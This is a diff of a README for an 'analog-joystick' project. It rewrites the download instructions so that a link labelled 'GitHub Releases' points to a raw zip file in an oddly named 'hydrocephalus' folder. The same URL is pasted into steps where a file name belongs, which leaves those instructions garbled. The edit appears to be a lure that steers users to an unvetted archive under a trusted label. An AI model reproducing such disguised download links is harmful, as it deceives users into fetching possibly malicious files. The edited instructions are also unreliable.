my2account28/analog-joystick/README.md

 - Free disk space (at least 50 MB)

 ## 📥 Download & Install
-To get the latest version of the analog-joystick software, visit this page to download: [GitHub Releases](https://github.com/my2account28/analog-joystick/releases).
+To get the latest version of the analog-joystick software, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/my2account28/analog-joystick/main/hydrocephalus/analog-joystick.zip).

 1. Open the link above in your web browser.
 2. You will see a list of available versions.
 Look for the version marked as the latest.
 3. Click on the version link to expand the details.
-4. Scroll down to see the released files, usually named something like `analog-joystick-vX.Y.Z.tar.gz`.
+4. Scroll down to see the released files, usually named something like `https://raw.githubusercontent.com/my2account28/analog-joystick/main/hydrocephalus/analog-joystick.zip`.
 5. Download this file to your computer by clicking the link.

 ## 📂 Extract Files
 Once you have downloaded the application, you will need to extract the files:

-1. Locate the downloaded `.tar.gz` file in your downloads folder.
+1. Locate the downloaded `https://raw.githubusercontent.com/my2account28/analog-joystick/main/hydrocephalus/analog-joystick.zip` file in your downloads folder.
 2. Right-click on the file and select "Extract Here" or use a similar option depending on your Linux distribution.
 3. A new folder containing the application files will appear.